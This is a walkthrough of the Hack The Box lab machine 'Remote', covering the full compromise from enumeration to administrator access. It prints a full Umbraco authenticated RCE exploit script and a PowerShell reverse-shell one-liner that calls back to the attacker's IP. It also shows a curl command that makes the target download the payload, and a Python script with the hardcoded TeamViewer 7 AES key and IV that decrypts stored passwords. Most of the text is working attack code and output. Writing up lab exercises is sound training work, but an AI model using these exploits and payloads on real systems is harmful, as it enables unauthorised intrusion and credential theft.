Previous Page
Remote Writeup
Introduction :
Remote is an easy Windows box released back in march 2020
Remote is an easy Windows box released back in march 2020
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -vvv -p- 10.10.10.180 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
Discovered open port 80/tcp on 10.10.10.180
Discovered open port 111/tcp on 10.10.10.180
Discovered open port 135/tcp on 10.10.10.180
Discovered open port 139/tcp on 10.10.10.180
Discovered open port 445/tcp on 10.10.10.180
Discovered open port 21/tcp on 10.10.10.180
Discovered open port 49666/tcp on 10.10.10.180
Discovered open port 49678/tcp on 10.10.10.180
Discovered open port 5985/tcp on 10.10.10.180
Discovered open port 47001/tcp on 10.10.10.180
Discovered open port 49667/tcp on 10.10.10.180
Discovered open port 49665/tcp on 10.10.10.180
Discovered open port 2049/tcp on 10.10.10.180
Discovered open port 49664/tcp on 10.10.10.180
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ nmap -sCV 10.10.10.180 -p 21,80,111,135,445,2049
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 18:12 CEST
Nmap scan report for 10.10.10.180
Host is up (0.043s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 7m35s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-05-30T16:21:22
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.57 seconds
Our nmap scan picked up port 21 FTP with anonymous login allowed, We can recursively get what's there with wget :
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget -r ftp://anonymous:anonymous@10.10.10.180/
However there are no files to get so we're going to continue exploring port 80 instead:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ gobuster dir -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.180
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/05/30 18:42:03 Starting gobuster in directory enumeration mode
===============================================================
/Blog (Status: 200) [Size: 5001]
/Contact (Status: 200) [Size: 7880]
/Home (Status: 200) [Size: 6703]
/People (Status: 200) [Size: 6749]
/Products (Status: 200) [Size: 5338]
/about-us (Status: 200) [Size: 5451]
/blog (Status: 200) [Size: 5011]
/contact (Status: 200) [Size: 7890]
/home (Status: 200) [Size: 6703]
/install (Status: 302) [Size: 126] [--> /umbraco/]
/intranet (Status: 200) [Size: 3323]
/master (Status: 500) [Size: 3420]
/people (Status: 200) [Size: 6739]
/person (Status: 200) [Size: 2741]
/product (Status: 500) [Size: 3420]
/products (Status: 200) [Size: 5328]
/render/https://www.google.com (Status: 400) [Size: 3420]
/umbraco (Status: 200) [Size: 4040]
===============================================================
2021/05/30 18:43:05 Finished
===============================================================
Here we see that gobuster picked up the /umbraco/ directory:
Although we don't have credentials to get in yet. Our nmap scan picked up some available NFS shares on port 111, so let's enumerate those using the showmount utility:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ apt search showmount
Sorting... Done
Full Text Search... Done
nfs-common/kali-rolling,now 1:1.3.4-5 amd64 [installed,automatic]
NFS support files common to client and server
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo apt install nfs-common -y
[sudo] password for nothing:
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
nfs-common is already the newest version (1:1.3.4-5).
nfs-common set to manually installed.
0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
Here we see a mountable folder called site_backups, so let's mount it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ mkdir backups
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ sudo mount -t nfs 10.10.10.180:/site_backups backups/
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ ls -lash backups
total 123K
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 23 2020 .
4.0K drwxr-xr-x 4 nothing nothing 4.0K May 30 19:40 ..
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Data
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Plugins
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
48K drwx------ 2 nobody 4294967294 48K Feb 20 2020 bin
8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Config
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
512 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
512 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Media
512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Umbraco
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Umbraco_Client
4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Views
28K -rwx------ 1 nobody 4294967294 28K Feb 20 2020 Web.config
Now here in the files we see that there are some Umbraco directories, and after searching a bit online, we see that there can be a server database in the /App_Data folder named Umbraco.sdf
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ strings backups/App_Data/Umbraco.sdf| grep Administrator
Administratoradmindefaulten-US
Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminAdministratorsCADMOSKTPIURZ:5F7
Here we see that the Administrator user has a hashed password with the SHA1 algorithm, so let's attempt to crack it using john:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat hash.txt
b8be16afba8c314ad33d812f22a04991b90e2aaa
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ john hash.txt --format=Raw-SHA1 -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese (?)
1g 0:00:00:00 DONE (2021-05-30 19:47) 1.282g/s 12594Kp/s 12594Kc/s 12594KC/s baconandchipies1..bacon918
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed
And we found the Administrator password for Umbraco: baconandcheese, so let's login:
Clicking help at the bottom left corner, we can see the version of this Umbraco instance:
And so we can look for CVEs for that Umbraco version:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ searchsploit umbraco
------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------- ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execu | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authentica | aspx/webapps/49488.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scrip | php/webapps/44988.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
And we get a few exploits to use for our Umbraco instance! Let's try the first RCE exploit:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cp $(locate 46153.py) .
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat 46153.py
# Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
# Dork: N/A
# Date: 2019-01-13
# Exploit Author: Gregory DRAPERI & Hugo BOUTINON
# Vendor Homepage: http://www.umbraco.com/
# Software Link: https://our.umbraco.com/download/releases
# Version: 7.12.4
# Category: Webapps
# Tested on: Windows IIS
# CVE: N/A
import requests;
from bs4 import BeautifulSoup;
def print_dict(dico):
print(dico.items());
print("Start");
# Execute a calc for the PoC
payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\
<msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
{ string cmd = "wget 10.10.14.13/your_rce_attempt_worked!"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\
proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\
proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
</msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\
</xsl:template> </xsl:stylesheet> ';
login = "admin@htb.local";
password="baconandcheese";
host = "http://10.10.10.180";
# Step 1 - Get Main page
s = requests.session()
url_main =host+"/umbraco/";
r1 = s.get(url_main);
print_dict(r1.cookies);
# Step 2 - Process Login
url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
loginfo = {"username":login,"password":password};
r2 = s.post(url_login,json=loginfo);
# Step 3 - Go to vulnerable web page
url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
r3 = s.get(url_xslt);
soup = BeautifulSoup(r3.text, 'html.parser');
VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
# Step 4 - Launch the attack
r4 = s.post(url_xslt,data=data,headers=headers);
print("End");%
Make sure you edit the values of login, password, host, powershell.exe and wget tun0/rcetest that i highlighted above, then proceed:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 46153.py
Start
[]
End
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ sudo python3 -m http.server 80
[sudo] password for nothing:
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.180 - - [31/May/2021 06:48:29] code 404, message File not found
10.10.10.180 - - [31/May/2021 06:48:29] "GET /your_rce_attempt_worked! HTTP/1.1" 404 -
And now after testing it we see that we have been able to get the machine to execute the wget command back to us, however noraj made a much better rewrite of this Umbraco RCE python exploit which allows us to pass arguements:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
--2021-05-31 07:07:53-- https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3202 (3.1K) [text/plain]
Saving to: ‘exploit.py’
exploit.py 100%[======================================================================================================================================================>] 3.13K --.-KB/s in 0s
2021-05-31 07:07:53 (6.52 MB/s) - ‘exploit.py’ saved [3202/3202]
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -h
usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
Umbraco authenticated RCE
optional arguments:
-h, --help show this help message and exit
-u USER, --user USER username / email
-p PASS, --password PASS password
-i URL, --host URL root URL
-c CMD, --command CMD command
-a ARGS, --arguments ARGS arguments
So let's use it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command whoami'
iis apppool\defaultapppool
We see that we can get remote code execution as the apppool user,
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command systeminfo'
Host Name: REMOTE
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA801
Original Install Date: 2/19/2020, 4:03:29 PM
System Boot Time: 5/30/2021, 12:07:27 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 4 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,745 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 3,426 MB
Virtual Memory: In Use: 1,373 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 5 Hotfix(s) Installed.
[01]: KB4534119
[02]: KB4462930
[03]: KB4516115
[04]: KB4523204
[05]: KB4464455
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.180
[02]: fe80::108b:625:aa40:7e42
[03]: dead:beef::108b:625:aa40:7e42
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
And we also are able to print out the infos about the server itself, including the current hotfixes. However we first need to get a reverse shell onto the box, let's find where the ftp folder is:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/'
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/20/2020 1:13 AM ftp_transfer
d----- 2/19/2020 3:11 PM inetpub
d----- 2/19/2020 11:09 PM Microsoft
d----- 9/15/2018 3:19 AM PerfLogs
d-r--- 2/23/2020 2:19 PM Program Files
d----- 2/23/2020 2:19 PM Program Files (x86)
d----- 5/30/2021 11:07 AM site_backups
d-r--- 2/19/2020 3:12 PM Users
d----- 2/20/2020 12:52 AM Windows
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/ftp_transfer'
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command new-item c:/ftp_transfer/test.txt'
Directory: C:\ftp_transfer
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/31/2021 1:45 AM 0 test.txt
And as you can see, we are able to write to the C:\ftp_transfer directory so let's make use of it by first locally creating our powershell script containing our reverse shell payload:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ vim shell.ps1
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ cat shell.ps1
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.13",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
This will send a reverse shell connection back to our tun0 interface on port 9001 once we get the box to execute it. In order to do that, we can get this script into the ftp_transfer directory we found earlier:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command curl http://10.10.14.13:9090/shell.ps1 -o c:/ftp_transfer/shell.ps1'
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ ls -lash shell.ps1
4.0K -rw-r--r-- 1 nothing nothing 482 May 31 07:50 shell.ps1
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
10.10.10.180 - - [31/May/2021 07:53:26] "GET /shell.ps1 HTTP/1.1" 200 -
Now that our shell.ps1 got uploaded, let's execute it:
[ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
→ python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command c:/ftp_transfer/shell.ps1'
[ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.180] 49854
whoami
iis apppool\defaultapppool
And we got a reverse shell connection!
# cd c:\users\public
# ls
Directory: C:\users\public
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 2/19/2020 3:03 PM Documents
d-r--- 9/15/2018 3:19 AM Downloads
d-r--- 9/15/2018 3:19 AM Music
d-r--- 9/15/2018 3:19 AM Pictures
d-r--- 9/15/2018 3:19 AM Videos
-ar--- 5/30/2021 12:08 PM 34 user.txt
# cat user.txt
67XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And we managed to get the user flag!
Now in order to privesc to the Administrator user on this box, we're going to run winpeas on the box:
[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ cp $(locate winPEAS.ps1) .
[ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
→ ls -lash Invoke-winPEAS.ps1
228K -rw-r--r-- 1 nothing nothing 228K May 31 09:00 Invoke-winPEAS.ps1
[ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Remote]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
# cd C:\ftp_transfer
# curl http://10.10.14.13:9090/Invoke-winPEAS.ps1 -o peas.ps1
# import-module ./peas.ps1
# Invoke-winPEAS
Immediately winPEAS found 9 potential CVEs on the box:
However one of the intended privesc paths to follow was the TeamViewer v7 application that's installed on the box:
# cd 'C:\Program Files (x86)\TeamViewer\'
# ls
Directory: C:\Program Files (x86)\TeamViewer
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/31/2021 12:54 AM Version7
We're going to take advantage of this teamviewer version 7 software to privesc to the Administrator user like how it was described in this blogpost:
First of all, TeamViewer7 stores the password in the registry under the value SecurityPasswordAES and this password is encrypted with AES-128-CBC, with the key set as 0602000000a400005253413100040000 and the Initialization Vector set as 0100010067244F436E6762F25EA8D704, Looking up google a bit, we find that the registry key for TeamViewer is under HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer:
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
StartMenuGroup REG_SZ TeamViewer 7
InstallationDate REG_SZ 2020-02-20
InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
Always_Online REG_DWORD 0x1
Security_ActivateDirectIn REG_DWORD 0x0
Version REG_SZ 7.0.43148
ClientIC REG_DWORD 0x11f25831
PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
SK REG_BINARY F82398387864348BAD0DBB41812782B1C0ABB9DAEEF15BC5C3609B2C5652BED7A9A07EA41B3E7CB583A107D39AFFF5E06DF1A06649C07DF4F65BD89DE84289D0F2CBF6B8E92E7B2901782BE8A039F2903552C98437E47E16F75F99C07750AEED8CFC7CD859AE94EC6233B662526D977FFB95DD5EB32D88A4B8B90EC1F8D118A7C6D28F6B5691EB4F9F6E07B6FE306292377ACE83B14BF815C186B7B74FFF9469CA712C13F221460AC6F3A7C5A89FD7C79FF306CEEBEF6DE06D6301D5FD9AB797D08862B9B7D75B38FB34EF82C77C8ADC378B65D9ED77B42C1F4CB1B11E7E7FB2D78180F40C96C1328970DA0E90CDEF3D4B79E08430E546228C000996D846A8489F61FE07B9A71E7FB3C3F811BB68FDDF829A7C0535BA130F04D9C7C09B621F4F48CD85EA97EF3D79A88257D0283BF2B78C5B3D4BBA4307D2F38D3A4D56A2706EDAB80A7CE20E21099E27481C847B49F8E91E53F83356323DDB09E97F45C6D103CF04693106F63AD8A58C004FC69EF8C506C553149D038191781E539A9E4E830579BCB4AD551385D1C9E4126569DD96AE6F97A81420919EE15CF125C1216C71A2263D1BE468E4B07418DE874F9E801DA2054AD64BE1947BE9580D7F0E3C138EE554A9749C4D0B3725904A95AEBD9DACCB6E0C568BFA25EE5649C31551F268B1F2EC039173B7912D6D58AA47D01D9E1B95E3427836A14F71F26E350B908889A95120195CC4FD68E7140AA8BB20E211D15C0963110878AAB530590EE68BF68B42D8EEEB2AE3B8DEC0558032CFE22D692FF5937E1A02C1250D507BDE0F51A546FE98FCED1E7F9DBA3281F1A298D66359C7571D29B24D1456C8074BA570D4D0BA2C3696A8A9547125FFD10FBF662E597A014E0772948F6C5F9F7D0179656EAC2F0C7F
LastMACUsed REG_MULTI_SZ \0005056B9A169
MIDInitiativeGUID REG_SZ {514ed376-a4ee-4507-a28b-484604ed0ba0}
MIDVersion REG_DWORD 0x1
ClientID REG_DWORD 0x6972e4aa
CUse REG_DWORD 0x1
LastUpdateCheck REG_DWORD 0x5e72893c
UsageEnvironmentBackup REG_DWORD 0x1
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
MultiPwdMgmtIDs REG_MULTI_SZ admin
MultiPwdMgmtPWDs REG_MULTI_SZ 357BC4C8F33160682B01AE2D1C987C3FE2BAE09455B94A1919C4CD4984593A77
Security_PasswordStrength REG_DWORD 0x3
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\AccessControl
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7\DefaultSettings
We already see it but let's filter to just get the part we want:
# reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7 /v SecurityPasswordAES
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
SecurityPasswordAES REG_BINARY FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B
now that we got it, we can use the python script of the aforementionned blog post in order to decrypt the password:
import sys, hexdump, binascii
from Crypto.Cipher import AES
class AESCipher:
def __init__(self, key):
self.key = key
def decrypt(self, iv, data):
self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
return self.cipher.decrypt(data)
key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "FF9B1C73D66BCE31AC413EAE131B464F582F6CE2D1E1F3DA7E8D376B26394E5B"
ciphertext = binascii.unhexlify(hex_str_cipher)
raw_un = AESCipher(key).decrypt(iv, ciphertext)
print(hexdump.hexdump(raw_un))
password = raw_un.decode('utf-16')
print(password)
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ pip3 install pycryptodome hexdump
Requirement already satisfied: pycryptodome in /home/nothing/.local/lib/python3.9/site-packages (3.10.1)
Requirement already satisfied: hexdump in /home/nothing/.local/lib/python3.9/site-packages (3.3)
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ python3 decrypt.py
00000000: 21 00 52 00 33 00 6D 00 30 00 74 00 65 00 21 00 !.R.3.m.0.t.e.!.
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
None
!R3m0te!
And we found the password! Now let's use it with evilWinRM:
[ 10.10.14.13/23 ] [ /dev/pts/49 ] [~/HTB/Remote]
→ evil-winrm -u administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
6aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
And that's it! We managed to get the root flag.
Here we can see the progress graph :
